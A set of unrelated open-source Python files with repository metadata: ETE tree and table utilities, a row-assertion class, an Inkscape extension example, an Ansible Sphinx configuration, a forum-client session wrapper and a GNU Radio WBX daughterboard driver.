max_field_length = max( [_safe_len(r[iv]) for r in rows] )
lengths[i] = max( [ header_length, max_field_length ] )
if header and print_header:
        # Print header names
for i in range(len(fields)):
print(_str(header[i]).rjust(lengths[i])+" | ", end=' ', file=stdout)
print("", file=stdout)
        # Print underlines
for i in range(len(fields)):
print("".rjust(lengths[i],"-")+" | ", end=' ', file=stdout)
print("", file=stdout)
        # Print table lines
for r in rows:
for i,iv in enumerate(fields):
#print >>stdout, _str(r[iv]).rjust(lengths[i])+" | ",
print(_safe_rjust(_str(r[iv]), lengths[i])+" | ", end=' ', file=stdout)
print("", file=stdout)
elif vtype == dict:
if header == []:
header = list(rows[0].keys())
for ppt in header:
lengths[ppt] = max( [_safe_len(_str(ppt))]+[ _safe_len(_str(p.get(ppt,""))) for p in rows])
if header:
for ppt in header:
print(_safe_rjust(_str(ppt), lengths[ppt])+" | ", end=' ', file=stdout)
print("", file=stdout)
for ppt in header:
print("".rjust(lengths[ppt],"-")+" | ", end=' ', file=stdout)
print("", file=stdout)
for p in rows:
for ppt in header:
                print(_safe_rjust(_str(p.get(ppt, "")), lengths[ppt])+" | ", end=' ', file=stdout)
print("", file=stdout)
def get_node2content(node, store=None):
if not store: store = {}
for ch in node.children:
get_node2content(ch, store=store)
if node.children:
val = []
for ch in node.children:
val.extend(store[ch])
store[node] = val
else:
store[node] = [node.name]
return store
def iter_prepostorder(tree, is_leaf_fn=None):
"""
EXPERIMENTAL
"""
to_visit = [tree]
if is_leaf_fn is not None:
_leaf = is_leaf_fn
else:
_leaf = tree.__class__.is_leaf
while to_visit:
node = to_visit.pop(-1)
try:
node = node[1]
except TypeError:
# PREORDER ACTIONS
yield (False, node)
if not _leaf(node):
# ADD CHILDREN
to_visit.extend(reversed(node.children + [[1, node]]))
else:
#POSTORDER ACTIONS
yield (True, node)
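# Usage sketch (illustrative): internal nodes are yielded twice, first as
# (False, node) in pre-order and again as (True, node) in post-order; leaves
# are yielded once, pre-order only:
#   for is_postorder, node in iter_prepostorder(tree):
#       ...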
def send_mail_smtp(toaddrs, subject, msg):
import smtplib
fromaddr = "no-reply@yournprprocess.local"
# The actual mail send
client = smtplib.SMTP('localhost', 1025)
client.sendmail(fromaddr, toaddrs, msg)
client.quit()
print("Mail sent to", toaddrs)
def send_mail(toaddrs, subject, text):
try:
from email.mime.text import MIMEText
from subprocess import Popen, PIPE
msg = MIMEText(text)
msg["From"] = 'YourNPRprocess@hostname'
msg["To"] = toaddrs
msg["Subject"] = subject
p = Popen(["/usr/sbin/sendmail", "-t"], stdin=PIPE)
p.communicate(msg.as_string())
except Exception as e:
print(e)
def symlink(target, link_name):
try:
os.remove(link_name)
except OSError:
pass
os.symlink(target, link_name)
def silent_remove(target):
try:
os.remove(target)
except OSError:
pass
def get_latest_nprdp(basedir):
avail_dbs = []
for fname in glob(os.path.join(basedir, "*.db")):
m = re.search("npr\.([\d\.]+)\.db", fname)
if m:
avail_dbs.append([float(m.groups()[0]), fname])
if avail_dbs:
avail_dbs.sort()
print(avail_dbs)
if avail_dbs:
last_db = avail_dbs[-1][1]
print("Using latest db file available:", os.path.basename(last_db))
return last_db
else:
#tries compressed data
compressed_path = pjoin(basedir, "nprdata.tar.gz")
if pexist(compressed_path):
import tarfile
tar = tarfile.open(compressed_path)
for member in tar:
print(member.name)
m = re.search("npr\.([\d\.]+)\.db", member.name)
if m:
print(member)
avail_dbs.append([float(m.groups()[0]), member])
return None
def npr_layout(node):
if node.is_leaf():
name = faces.AttrFace("name", fsize=12)
faces.add_face_to_node(name, node, 0, position="branch-right")
if hasattr(node, "sequence"):
seq_face = faces.SeqFace(node.sequence, [])
faces.add_face_to_node(seq_face, node, 0, position="aligned")
if "treemerger_type" in node.features:
ttype=faces.AttrFace("tree_type", fsize=8, fgcolor="DarkBlue")
faces.add_face_to_node(ttype, node, 0, position="branch-top")
#ttype.background.color = "DarkOliveGreen"
node.img_style["size"] = 20
node.img_style["fgcolor"] = "red"
if "alg_type" in node.features:
faces.add_face_to_node(faces.AttrFace("alg_type", fsize=8), node, 0, position="branch-top")
if "treemerger_rf" in node.features:
faces.add_face_to_node(faces.AttrFace("treemerger_rf", fsize=8), node, 0, position="branch-bottom")
support_radius= (1.0 - node.support) * 30
if support_radius > 1:
support_face = faces.CircleFace(support_radius, "red")
faces.add_face_to_node(support_face, node, 0, position="float-behind")
support_face.opacity = 0.25
faces.add_face_to_node(faces.AttrFace("support", fsize=8), node, 0, position="branch-bottom")
if "clean_alg_mean_identn" in node.features:
identity = node.clean_alg_mean_identn
elif "alg_mean_identn" in node.features:
identity = node.alg_mean_identn
if "highlighted" in node.features:
node.img_style["bgcolor"] = "LightCyan"
if "improve" in node.features:
color = "orange" if float(node.improve) < 0 else "green"
if float(node.improve) == 0:
color = "blue"
support_face = faces.CircleFace(200, color)
faces.add_face_to_node(support_face, node, 0, position="float-behind")
try:
from ete3 import TreeStyle, NodeStyle, faces
from ete3.treeview import random_color
NPR_TREE_STYLE = TreeStyle()
NPR_TREE_STYLE.layout_fn = npr_layout
NPR_TREE_STYLE.show_leaf_name = False
except ImportError:
TreeStyle, NodeStyle, faces, random_color = [None]*4
NPR_TREE_STYLE = None
# CONVERT shell colors to the same curses palette
COLORS = {
"wr": '\033[1;37;41m', # white on red
"wo": '\033[1;37;43m', # white on orange
"wm": '\033[1;37;45m', # white on magenta
"wb": '\033[1;37;46m', # white on blue
"bw": '\033[1;37;40m', # black on white
"lblue": '\033[1;34m', # light blue
"lred": '\033[1;31m', # light red
"lgreen": '\033[1;32m', # light green
"yellow": '\033[1;33m', # yellow
"cyan": '\033[36m', # cyan
"blue": '\033[34m', # blue
"green": '\033[32m', # green
"orange": '\033[33m', # orange
"red": '\033[31m', # red
"magenta": "\033[35m", # magenta
"white": "\033[0m", # white
None: "\033[0m", # end
}
def colorify(string, color):
return "%s%s%s" %(COLORS[color], string, COLORS[None])
def clear_color(string):
    return re.sub(r"\033\[[^m]+m", "", string)
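# Round-trip note: clear_color strips exactly the ANSI escapes that colorify
# (via the COLORS table) produces, so clear_color(colorify(s, "red")) == s.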
|
fmaguire/ete
|
ete3/tools/phylobuild_lib/utils.py
|
Python
|
gpl-3.0
| 21,864
|
import re
from . import expression
class AssertionBase:
pass
class RowAssertion(AssertionBase):
def __init__(self, config, assert_config):
assert assert_config["type"] == "row"
self.config = config
self.assert_config = assert_config
def check(self, data):
if self.type == "eq":
return self.assertEqual(data)
elif self.type == "in":
return self.assertIn(data)
elif self.type == "match":
return self.assertMatch(data)
raise NotImplementedError
def error_message(self, data):
if self.type == "eq":
source = self.get(self.args_source, data)
return "{} != {}".format(source, repr(self.args_value))
elif self.type == "in":
source = self.get(self.args_source, data)
return "{} not in {}".format(repr(self.args_value), source)
elif self.type == "match":
source = self.get(self.args_source, data)
return "{} does not match {}".format(source, repr(self.args_value))
raise NotImplementedError
def assertEqual(self, data):
source = self.get(self.args_source, data)
value = self.args_value
return source == value
def assertIn(self, data):
value = self.args_value
source = self.get(self.args_source, data)
return value in source
def assertMatch(self, data):
value = self.args_value
source = self.get(self.args_source, data)
return bool(re.match(value, source))
def get(self, item, data):
if isinstance(item, int):
return data[item]
elif isinstance(item, str) and expression.is_slice(item):
s = expression.to_slice(item)
return data[s]
raise NotImplementedError
@property
def type(self):
return self.assert_config["f"]
@property
def args_source(self):
return self.assert_config["args"]["source"]
@property
def args_value(self):
value = self.assert_config["args"]["value"]
if expression.is_config_expr(value):
value = self.config.evaluate(value)
return value
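# Usage sketch (hypothetical config values; `config` is whatever object the
# surrounding package provides, assumed to expose .evaluate() for expressions):
#
#   assertion = RowAssertion(config, {
#       "type": "row",
#       "f": "match",
#       "args": {"source": 0, "value": r"^\d{4}-\d{2}-\d{2}$"},
#   })
#   row = ["2021-01-31", "ok"]
#   if not assertion.check(row):
#       raise AssertionError(assertion.error_message(row))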
|
mugwort-rc/idata
|
idata/config/assertion.py
|
Python
|
gpl-3.0
| 2,193
|
# Copyright (c) Mathias Kaerlev 2012.
# This file is part of Anaconda.
# Anaconda is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# Anaconda is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Anaconda. If not, see <http://www.gnu.org/licenses/>.
from mmfparser.data.chunkloaders.actions.names import *
|
joaormatos/anaconda
|
mmfparser/data/chunkloaders/actions/__init__.py
|
Python
|
gpl-3.0
| 749
|
#!/usr/bin/python
import inkex
import inkscapeMadeEasy_Base as inkBase
import inkscapeMadeEasy_Draw as inkDraw
class myExtension(inkBase.inkscapeMadeEasy):
def __init__(self):
inkex.Effect.__init__(self)
self.OptionParser.add_option("--tab", action="store", type="string", dest="tab", default="object")
self.OptionParser.add_option("--myColorPicker", action="store", type="string", dest="myColorPickerVar", default='0')
self.OptionParser.add_option("--myColorOption", action="store", type="string", dest="myColorOptionVar", default='0')
def effect(self):
color = inkDraw.color.colorPickerToRGBalpha(self.options.myColorPickerVar)
        # Do the same thing, but first check whether myColorOptionVar provides a predefined color or asks to take it from the picker.
color = inkDraw.color.parseColorPicker(self.options.myColorOptionVar, self.options.myColorPickerVar)
if __name__ == '__main__':
x = myExtension()
x.affect()
|
fsmMLK/inkscapeMadeEasy
|
examples/iME_Draw_colorPicker.py
|
Python
|
gpl-3.0
| 1,000
|
# -*- coding: utf-8 -*-
#
# documentation build configuration file, created by
# sphinx-quickstart on Sat Sep 27 13:23:22 2008-2009.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed
# automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import sys
import os
# pip install sphinx_rtd_theme
# import sphinx_rtd_theme
# html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
# sys.path.append(os.path.abspath('some/directory'))
#
sys.path.insert(0, os.path.join('ansible', 'lib'))
sys.path.append(os.path.abspath(os.path.join('..', '_extensions')))
# We want sphinx to document the ansible modules contained in this repository,
# not those that may happen to be installed in the version
# of Python used to run sphinx. When sphinx loads in order to document,
# the repository version needs to be the one that is loaded:
sys.path.insert(0, os.path.abspath(os.path.join('..', '..', '..', 'lib')))
VERSION = '2.10'
AUTHOR = 'Ansible, Inc'
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings.
# They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
# TEST: 'sphinxcontrib.fulltoc'
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx', 'pygments_lexer', 'notfound.extension']
# Later on, add 'sphinx.ext.viewcode' to the list if you want to have
# colorized code generated too for references.
# Add any paths that contain templates here, relative to this directory.
templates_path = ['.templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General substitutions.
project = 'Ansible'
copyright = "2021 Red Hat, Inc."
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# The short X.Y version.
version = VERSION
# The full version, including alpha/beta/rc tags.
release = VERSION
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
# unused_docs = []
# List of directories, relative to source directories, that shouldn't be
# searched for source files.
# exclude_dirs = []
# A list of glob-style patterns that should be excluded when looking
# for source files.
exclude_patterns = [
'2.10_index.rst',
'ansible_index.rst',
'core_index.rst',
'porting_guides/core_porting_guides',
]
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
highlight_language = 'YAML+Jinja'
# Substitutions, variables, entities, & shortcuts for text which do not need to link to anything.
# For titles which should be a link, use the intersphinx anchors set at the index, chapter, and section levels, such as qi_start_:
# |br| is useful for formatting fields inside of tables
# |_| is a nonbreaking space; similarly useful inside of tables
rst_epilog = """
.. |br| raw:: html

   <br>

.. |_| unicode:: 0xA0
   :trim:
"""
# Options for HTML output
# -----------------------
html_theme_path = ['../_themes']
html_theme = 'sphinx_rtd_theme'
html_short_title = 'Ansible Documentation'
html_show_sphinx = False
html_theme_options = {
'canonical_url': "https://docs.ansible.com/ansible/latest/",
'vcs_pageview_mode': 'edit'
}
html_context = {
'display_github': 'True',
'github_user': 'ansible',
'github_repo': 'ansible',
'github_version': 'devel/docs/docsite/rst/',
'github_module_version': 'devel/lib/ansible/modules/',
'github_root_dir': 'devel/lib/ansible',
'github_cli_version': 'devel/lib/ansible/cli/',
'current_version': version,
'latest_version': '2.10',
# list specifically out of order to make latest work
'available_versions': ('latest', '2.9', '2.9_ja', '2.8', 'devel'),
'css_files': ('_static/ansible.css', # overrides to the standard theme
),
}
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
# html_style = 'solar.css'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = 'Ansible Documentation'
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (within the static path) to place at the top of
# the sidebar.
# html_logo =
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = 'favicon.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['../_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_use_modindex = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
html_copy_source = False
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = 'https://docs.ansible.com/ansible/latest'
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'Poseidodoc'
# Configuration for sphinx-notfound-pages
# with no 'notfound_template' and no 'notfound_context' set,
# the extension builds 404.rst into a location-agnostic 404 page
#
# default is `en` - using this for the sub-site:
notfound_default_language = "ansible"
# default is `latest`:
# setting explicitly - docsite serves up /ansible/latest/404.html
# so keep this set to `latest` even on the `devel` branch
# then no maintenance is needed when we branch a new stable_x.x
notfound_default_version = "latest"
# makes default setting explicit:
notfound_no_urls_prefix = False
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
# latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
# latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class
# [howto/manual]).
latex_documents = [
('index', 'ansible.tex', 'Ansible 2.2 Documentation', AUTHOR, 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# Additional stuff for the LaTeX preamble.
# latex_preamble = ''
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_use_modindex = True
autoclass_content = 'both'
# Note: Our strategy for intersphinx mappings is to have the upstream build location as the
# canonical source and then cached copies of the mapping stored locally in case someone is building
# when disconnected from the internet. We then have a script to update the cached copies.
#
# Because of that, each entry in this mapping should have this format:
# name: ('http://UPSTREAM_URL', (None, 'path/to/local/cache.inv'))
#
# The update script depends on this format so deviating from this (for instance, adding a third
# location for the mapping to live) will confuse it.
intersphinx_mapping = {'python': ('https://docs.python.org/2/', (None, '../python2.inv')),
'python3': ('https://docs.python.org/3/', (None, '../python3.inv')),
'jinja2': ('http://jinja.palletsprojects.com/', (None, '../jinja2.inv')),
'ansible_2_10': ('https://docs.ansible.com/ansible/2.10/', (None, '../ansible_2_10.inv')),
'ansible_2_9': ('https://docs.ansible.com/ansible/2.9/', (None, '../ansible_2_9.inv')),
'ansible_2_8': ('https://docs.ansible.com/ansible/2.8/', (None, '../ansible_2_8.inv')),
'ansible_2_7': ('https://docs.ansible.com/ansible/2.7/', (None, '../ansible_2_7.inv')),
'ansible_2_6': ('https://docs.ansible.com/ansible/2.6/', (None, '../ansible_2_6.inv')),
'ansible_2_5': ('https://docs.ansible.com/ansible/2.5/', (None, '../ansible_2_5.inv')),
}
# linkchecker settings
linkcheck_ignore = [
r'http://irc\.freenode\.net',
]
linkcheck_workers = 25
# linkcheck_anchors = False
|
dmsimard/ansible
|
docs/docsite/sphinx_conf/2.10_conf.py
|
Python
|
gpl-3.0
| 10,553
|
from sa_tools.base.magic import MagicMixin
from sa_tools.inbox import Inbox
from sa_tools.session import SASession
from sa_tools.index import Index
import os
import pickle
import sys
def py_ver() -> str:
return str(sys.version_info.major)
class APSession(object):
def __init__(self, username: str, passwd: str=None, save_session: bool=False, *args, **kwargs):
self.username = username
self.passwd = passwd
self._session_bak = \
'.' + username.replace(' ', '_') + py_ver() + '.bak'
self.session = self._get_session(save_session=save_session)
del passwd
del self.passwd
def _get_session(self, save_session: bool=True) -> SASession:
backup_exists = os.path.exists(self._session_bak)
# session = None
if backup_exists:
session = self._load_session()
else:
session = SASession(self.username, self.passwd)
if save_session:
self._save_session(session)
return session
    def _load_session(self) -> SASession:
with open(self._session_bak, 'rb') as old_session:
print("Loading from backup: " + self._session_bak)
session = pickle.load(old_session)
return session
def _save_session(self, session: SASession) -> None:
with open(self._session_bak, 'wb') as session_file:
pickle.dump(session, session_file)
class AwfulPy(APSession, MagicMixin):
def __init__(self, username, *args, **kwargs):
super().__init__(username, *args, **kwargs)
self.index = Index(self.session)
self.inbox = Inbox(self.session)
self.name = "awful.py"
self.version = "v0.2014.08.24"
def __repr__(self):
info = '[' + self.name + ' ' + self.version + '] '
acct = 'Logged in as ' + self.username
login_time = ' on ' + self.session.login_time
return info + acct + login_time
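# Usage sketch (hypothetical credentials):
#   client = AwfulPy('some user', passwd='secret', save_session=True)
#   print(client)                # "[awful.py v0.2014.08.24] Logged in as ..."
#   client.index, client.inbox   # both built on the shared SASession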
|
thismachinechills/awful.py
|
awful.py
|
Python
|
gpl-3.0
| 1,950
|
#
# Copyright 2007 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import usrp1
import time,math
from usrpm import usrp_dbid
import db_base
import db_instantiator
from usrpm.usrp_fpga_regs import *
#debug_using_gui = True # Must be set to True or False
debug_using_gui = False # Must be set to True or False
#if debug_using_gui:
# import flexrf_debug_gui
# d'board i/o pin defs
# TX IO Pins
TX_POWER = (1 << 0) # TX Side Power
RX_TXN = (1 << 1) # T/R antenna switch for TX/RX port
# RX IO Pins
RX2_RX1N = (1 << 0) # antenna switch between RX2 and TX/RX port
RXENABLE = (1 << 1) # enables mixer
PLL_LOCK_DETECT = (1 << 2) # Muxout pin from PLL -- MUST BE INPUT
MReset = (1 << 3) # NB6L239 Master Reset, asserted low
SELA0 = (1 << 4) # NB6L239 SelA0
SELA1 = (1 << 5) # NB6L239 SelA1
SELB0 = (1 << 6) # NB6L239 SelB0
SELB1 = (1 << 7) # NB6L239 SelB1
PLL_ENABLE = (1 << 8) # CE Pin on PLL
AUX_SCLK = (1 << 9) # ALT SPI SCLK
AUX_SDO = (1 << 10) # ALT SPI SDO
AUX_SEN = (1 << 11) # ALT SPI SEN
SPI_ENABLE_TX_A = usrp1.SPI_ENABLE_TX_A
SPI_ENABLE_TX_B = usrp1.SPI_ENABLE_TX_B
SPI_ENABLE_RX_A = usrp1.SPI_ENABLE_RX_A
SPI_ENABLE_RX_B = usrp1.SPI_ENABLE_RX_B
"""
A few comments about the WBX boards:
They are half-duplex. I.e., transmit and receive are mutually exclusive.
There is a single LO for both the Tx and Rx sides.
The shared control signals are hung off of the Rx side.
The shared io controls are duplexed onto the Rx side pins.
The wbx_high d'board always needs to be in 'auto_tr_mode'
"""
class wbx_base(db_base.db_base):
"""
Abstract base class for all wbx boards.
Derive board specific subclasses from db_wbx_base_{tx,rx}
"""
def __init__(self, usrp, which):
"""
@param usrp: instance of usrp.source_c
@param which: which side: 0 or 1 corresponding to side A or B respectively
@type which: int
"""
# sets _u _which _tx and _slot
db_base.db_base.__init__(self, usrp, which)
self.first = True
self.spi_format = usrp1.SPI_FMT_MSB | usrp1.SPI_FMT_HDR_0
# FIXME -- the write reg functions don't work with 0xffff for masks
self._rx_write_oe(int(PLL_ENABLE|MReset|SELA0|SELA1|SELB0|SELB1|RX2_RX1N|RXENABLE), 0x7fff)
self._rx_write_io((PLL_ENABLE|MReset|0|RXENABLE), (PLL_ENABLE|MReset|RX2_RX1N|RXENABLE))
self._tx_write_oe((TX_POWER|RX_TXN), 0x7fff)
self._tx_write_io((0|RX_TXN), (TX_POWER|RX_TXN)) # TX off, TR switch set to RX
self.spi_enable = (SPI_ENABLE_RX_A, SPI_ENABLE_RX_B)[which]
self.set_auto_tr(False)
#if debug_using_gui:
# title = "FlexRF Debug Rx"
# if self._tx:
# title = "FlexRF Debug Tx"
# self.gui = flexrf_debug_gui.flexrf_debug_gui(self, title)
# self.gui.Show(True)
def __del__(self):
#self._u.write_io(self._which, self.power_off, POWER_UP) # turn off power to board
#self._u._write_oe(self._which, 0, 0xffff) # turn off all outputs
self.set_auto_tr(False)
def _lock_detect(self):
"""
@returns: the value of the VCO/PLL lock detect bit.
@rtype: 0 or 1
"""
if self._rx_read_io() & PLL_LOCK_DETECT:
return True
else: # Give it a second chance
if self._rx_read_io() & PLL_LOCK_DETECT:
return True
else:
return False
# Both sides need access to the Rx pins.
# Write them directly, bypassing the convenience routines.
# (Sort of breaks modularity, but will work...)
def _tx_write_oe(self, value, mask):
return self._u._write_fpga_reg((FR_OE_0, FR_OE_2)[self._which],
((mask & 0xffff) << 16) | (value & 0xffff))
def _rx_write_oe(self, value, mask):
return self._u._write_fpga_reg((FR_OE_1, FR_OE_3)[self._which],
((mask & 0xffff) << 16) | (value & 0xffff))
def _tx_write_io(self, value, mask):
return self._u._write_fpga_reg((FR_IO_0, FR_IO_2)[self._which],
((mask & 0xffff) << 16) | (value & 0xffff))
def _rx_write_io(self, value, mask):
return self._u._write_fpga_reg((FR_IO_1, FR_IO_3)[self._which],
((mask & 0xffff) << 16) | (value & 0xffff))
def _rx_read_io(self):
t = self._u._read_fpga_reg((FR_RB_IO_RX_A_IO_TX_A, FR_RB_IO_RX_B_IO_TX_B)[self._which])
return (t >> 16) & 0xffff
def _tx_read_io(self):
t = self._u._read_fpga_reg((FR_RB_IO_RX_A_IO_TX_A, FR_RB_IO_RX_B_IO_TX_B)[self._which])
return t & 0xffff
def _compute_regs(self, freq):
"""
Determine values of registers, along with actual freq.
@param freq: target frequency in Hz
@type freq: float
@returns: (R, N, func, init, actual_freq)
@rtype: tuple(int, int, int, int, float)
Override this in derived classes.
"""
raise NotImplementedError
def _refclk_freq(self):
return float(self._u.fpga_master_clock_freq())/self._refclk_divisor()
def _refclk_divisor(self):
"""
Return value to stick in REFCLK_DIVISOR register
"""
return 1
# ----------------------------------------------------------------
def set_freq(self, freq):
"""
@returns (ok, actual_baseband_freq) where:
ok is True or False and indicates success or failure,
actual_baseband_freq is the RF frequency that corresponds to DC in the IF.
"""
raise NotImplementedError
def gain_range(self):
"""
Return range of gain that can be set by this d'board.
@returns (min_gain, max_gain, step_size)
Where gains are expressed in decibels (your mileage may vary)
"""
raise NotImplementedError
def set_gain(self, gain):
"""
Set the gain.
@param gain: gain in decibels
@returns True/False
"""
raise NotImplementedError
def _set_pga(self, pga_gain):
if(self._which == 0):
self._u.set_pga (0, pga_gain)
self._u.set_pga (1, pga_gain)
else:
self._u.set_pga (2, pga_gain)
self._u.set_pga (3, pga_gain)
def is_quadrature(self):
"""
Return True if this board requires both I & Q analog channels.
This bit of info is useful when setting up the USRP Rx mux register.
"""
return True
# ----------------------------------------------------------------
class wbx_base_tx(wbx_base):
def __init__(self, usrp, which):
"""
@param usrp: instance of usrp.sink_c
@param which: 0 or 1 corresponding to side TX_A or TX_B respectively.
"""
wbx_base.__init__(self, usrp, which)
# power up the transmit side, NO -- but set antenna to receive
self._u.write_io(self._which, (TX_POWER), (TX_POWER|RX_TXN))
self._lo_offset = 0e6
# Gain is not set by the PGA, but the PGA must be set at max gain in the TX
return self._set_pga(self._u.pga_max())
def __del__(self):
# Power down and leave the T/R switch in the R position
self._u.write_io(self._which, (RX_TXN), (TX_POWER|RX_TXN))
wbx_base.__del__(self)
def set_auto_tr(self, on):
if on:
self.set_atr_mask (RX_TXN)
self.set_atr_txval(0)
self.set_atr_rxval(RX_TXN)
else:
self.set_atr_mask (0)
self.set_atr_txval(0)
self.set_atr_rxval(0)
def set_enable(self, on):
"""
Enable transmitter if on is True
"""
if on:
v = 0
else:
v = RX_TXN
self._u.write_io(self._which, v, RX_TXN)
def set_lo_offset(self, offset):
"""
Set amount by which LO is offset from requested tuning frequency.
@param offset: offset in Hz
"""
self._lo_offset = offset
def lo_offset(self):
"""
Get amount by which LO is offset from requested tuning frequency.
@returns Offset in Hz
"""
return self._lo_offset
class wbx_base_rx(wbx_base):
def __init__(self, usrp, which):
"""
@param usrp: instance of usrp.source_c
@param which: 0 or 1 corresponding to side RX_A or RX_B respectively.
"""
wbx_base.__init__(self, usrp, which)
# set up for RX on TX/RX port
self.select_rx_antenna('TX/RX')
self.bypass_adc_buffers(True)
self._lo_offset = -4e6
def __del__(self):
# Power down
self._u.write_io(self._which, 0, (RXENABLE))
wbx_base.__del__(self)
def set_auto_tr(self, on):
if on:
            self.set_atr_mask (RXENABLE)
            self.set_atr_txval(0)
            self.set_atr_rxval(RXENABLE)
else:
self.set_atr_mask (0)
self.set_atr_txval(0)
self.set_atr_rxval(0)
def select_rx_antenna(self, which_antenna):
"""
Specify which antenna port to use for reception.
@param which_antenna: either 'TX/RX' or 'RX2'
"""
if which_antenna in (0, 'TX/RX'):
self._u.write_io(self._which, 0, RX2_RX1N)
elif which_antenna in (1, 'RX2'):
self._u.write_io(self._which, RX2_RX1N, RX2_RX1N)
else:
raise ValueError, "which_antenna must be either 'TX/RX' or 'RX2'"
def set_gain(self, gain):
"""
Set the gain.
@param gain: gain in decibels
@returns True/False
"""
maxgain = self.gain_range()[1] - self._u.pga_max()
mingain = self.gain_range()[0]
if gain > maxgain:
pga_gain = gain-maxgain
assert pga_gain <= self._u.pga_max()
agc_gain = maxgain
else:
pga_gain = 0
agc_gain = gain
V_maxgain = .2
V_mingain = 1.2
V_fullscale = 3.3
dac_value = (agc_gain*(V_maxgain-V_mingain)/(maxgain-mingain) + V_mingain)*4096/V_fullscale
assert dac_value>=0 and dac_value<4096
return self._u.write_aux_dac(self._which, 0, int(dac_value)) and \
self._set_pga(int(pga_gain))
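    # Illustrative split (hypothetical numbers): if gain_range() gave
    # (0, 65, 0.05) with pga_max() == 20, then maxgain == 45, and a request of
    # 50 dB becomes agc_gain = 45 on the aux DAC plus pga_gain = 5 on the PGA.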
def set_lo_offset(self, offset):
"""
Set amount by which LO is offset from requested tuning frequency.
@param offset: offset in Hz
"""
self._lo_offset = offset
def lo_offset(self):
"""
Get amount by which LO is offset from requested tuning frequency.
@returns Offset in Hz
"""
return self._lo_offset
def i_and_q_swapped(self):
"""
Return True if this is a quadrature device and ADC 0 is Q.
"""
return True
# ----------------------------------------------------------------
class _ADF410X_common(object):
def __init__(self):
# R-Register Common Values
self.R_RSV = 0 # bits 23,22,21
self.LDP = 1 # bit 20 Lock detect in 5 cycles
self.TEST = 0 # bit 19,18 Normal
self.ABP = 0 # bit 17,16 2.9ns
# N-Register Common Values
self.N_RSV = 0 # 23,22
self.CP_GAIN = 0 # 21
# Function Register Common Values
self.P = 0 # bits 23,22 0 = 8/9, 1 = 16/17, 2 = 32/33, 3 = 64/65
self.PD2 = 0 # bit 21 Normal operation
self.CP2 = 7 # bits 20,19,18 CP Gain = 5mA
self.CP1 = 7 # bits 17,16,15 CP Gain = 5mA
self.TC = 0 # bits 14-11 PFD Timeout
self.FL = 0 # bit 10,9 Fastlock Disabled
self.CP3S = 0 # bit 8 CP Enabled
self.PDP = 0 # bit 7 Phase detector polarity, Positive=1
self.MUXOUT = 1 # bits 6:4 Digital Lock Detect
self.PD1 = 0 # bit 3 Normal operation
self.CR = 0 # bit 2 Normal operation
